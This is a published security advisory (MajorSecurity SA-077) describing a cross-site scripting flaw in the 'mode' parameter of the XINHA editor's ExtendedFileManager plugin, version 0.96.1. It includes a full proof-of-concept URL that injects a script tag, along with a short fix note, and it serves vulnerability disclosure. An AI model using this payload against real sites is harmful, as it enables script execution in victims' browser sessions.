XINHA Editor Plugin ExtendedFileManager Cross Site Scripting

`[MajorSecurity SA-077]XINHA Editor Plugin "ExtendedFileManager" - Cross  
Site Scripting Issue  
  
Details  
=============  
Product: XINHA Editor Plugin "ExtendedFileManager"  
Security-Risk: low  
Remote-Exploit: yes  
Vendor-URL: http://www.xinha.org/  
Advisory-Status: published  
  
Credits  
=============  
Discovered by: David Vieira-Kurz of MajorSecurity  
  
Original Advisory  
=============  
http://www.majorsecurity.net/xinha-editor-xss.php  
  
Affected Products:  
=============  
XINHA Editor 0.96.1 Plugin "ExtendedFileManager"  
Prior versions may also be vulnerable  
  
Description  
=============  
"Xinha (pronounced like Xena, the Warrior Princess) is a powerful  
WYSIWYG HTML editor component that works in all current browsers." -  
from xinha.org  
  
More Details  
=============  
We at MajorSecurity have discovered some vulnerabilities in one of the  
Plugins in XINHA WYSIWYG Editor version 0.96.1, which can be exploited  
by malicious people to conduct cross-site scripting attacks. Input  
passed directly to the "mode" parameter in "backend.php" of the  
"ExtendedFileManager" Plugin is not properly sanitised before being  
stored and returned to the user. This can be exploited to execute  
arbitrary HTML and script code in a user's browser session in context of  
an affected site.  
  
Proof of concept  
=============  
http://localhost/xinha-0.96.1/plugins/ExtendedFileManager/backend.php?__plugin=ExtendedFileManager&__function=manager&backend_data[data]=a%3A9%3A{s%3A17%3A%22max_foldersize_mb%22%3Bi%3A10%3Bs%3A9%3A%22files_dir%22%3Bs%3A38%3A%22%2Fwww%2Fhtdocs%2Fw007ec76%2Fx_examples%2Fimages%22%3Bs%3A10%3A%22images_dir%22%3Bs%3A38%3A%22%2Fwww%2Fhtdocs%2Fw007ec76%2Fx_examples%2Fimages%22%3Bs%3A9%3A%22files_url%22%3Bs%3A19%3A%22%2Fx_examples%2Fimages%2F%22%3Bs%3A10%3A%22images_url%22%3Bs%3A19%3A%22%2Fx_examples%2Fimages%2F%22%3Bs%3A21%3A%22images_enable_styling%22%3Bb%3A0%3Bs%3A21%3A%22max_filesize_kb_image%22%3Bi%3A200%3Bs%3A20%3A%22max_filesize_kb_link%22%3Bs%3A3%3A%22max%22%3Bs%3A23%3A%22allowed_link_extensions%22%3Ba%3A12%3A{i%3A0%3Bs%3A3%3A%22jpg%22%3Bi%3A1%3Bs%3A3%3A%22gif%22%3Bi%3A2%3Bs%3A2%3A%22js%22%3Bi%3A3%3Bs%3A3%3A%22pdf%22%3Bi%3A4%3Bs%3A3%3A%22zip%22%3Bi%3A5%3Bs%3A3%3A%22txt%22%3Bi%3A6%3Bs%3A3%3A%22psd%22%3Bi%3A7%3Bs%3A3%3A%22png%22%3Bi%3A8%3Bs%3A4%3A%22html%22%3Bi%3A9%3Bs%3A3%3A  
  
%22swf%22%3Bi%3A10%3Bs%3A3%3A%22xml%22%3Bi%3A11%3Bs%3A3%3A%22xls%22%3B}}&backend_data[session_name]=PHPSESSID&backend_data[key_location]=Xinha%3ABackendKey&backend_data[hash]=582686c520f11fc779ada11642d7e3b5711a3c37&PHPSESSID=599be382ae27a9a75cd2e7d039b2098a&mode="<script>alert(/XSS/)</script>  
  
Solution  
=============  
Web applications should never trust on user generated input and  
therefore sanatize all input. Edit the source code to ensure that input  
is properly sanitised.  
`